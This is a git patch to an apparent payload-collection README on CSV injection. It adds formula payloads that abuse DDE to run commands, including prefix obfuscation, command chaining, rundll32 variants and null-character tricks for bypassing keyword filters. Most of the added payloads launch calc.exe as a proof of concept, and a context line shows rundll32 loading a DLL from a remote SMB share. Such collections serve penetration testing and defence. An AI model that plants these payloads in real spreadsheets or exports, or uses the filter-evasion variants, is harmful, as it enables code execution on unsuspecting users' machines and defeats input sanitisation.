From 126555e5f933e5f8a12a8facd4bd3461529de8b8 Mon Sep 17 00:00:00 2001 From: Tametomo Date: Tue, 16 Mar 2021 19:17:01 -0600 Subject: [PATCH] Update README.md Add additional CSV test cases --- CSV Injection/README.md | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/CSV Injection/README.md b/CSV Injection/README.md index a6f54e5..6c1236f 100644 --- a/CSV Injection/README.md +++ b/CSV Injection/README.md @@ -20,6 +20,20 @@ DDE ("cmd";"/C calc";"!A0")A0 # msf smb delivery with rundll32 =cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1 + +# Prefix obfuscation and command chaining +=AAAA+BBBB-CCCC&"Hello"/12345&cmd|'/c calc.exe'!A +=cmd|'/c calc.exe'!A*cmd|'/c calc.exe'!A ++thespanishinquisition(cmd|'/c calc.exe'!A += cmd|'/c calc.exe'!A + +# Using rundll32 instead of cmd +=rundll32|'URL.dll,OpenURL calc.exe'!A +=rundll321234567890abcdefghijklmnopqrstuvwxyz|'URL.dll,OpenURL calc.exe'!A + +# Using null characters to bypass dictionary filters. Since they are not spaces, they are ignored when executed. += C m D | '/ c c al c . e x e ' ! A + ``` Technical Details of the above payload: @@ -46,3 +60,4 @@ Any formula can be started with * [From CSV to Meterpreter - 5th November 2015 - Adam Chester](https://blog.xpnsec.com/from-csv-to-meterpreter/) * [CSV Injection -> Meterpreter on Pornhub - @ZephrFish Andy](https://news.webamooz.com/wp-content/uploads/bot/offsecmag/147.pdf) * [The Absurdly Underestimated Dangers of CSV Injection - 7 October, 2017 - George Mauer](http://georgemauer.net/2017/10/07/csv-injection.html) +* [Three New DDE Obfuscation Methods](https://blog.reversinglabs.com/blog/cvs-dde-exploits-and-obfuscation)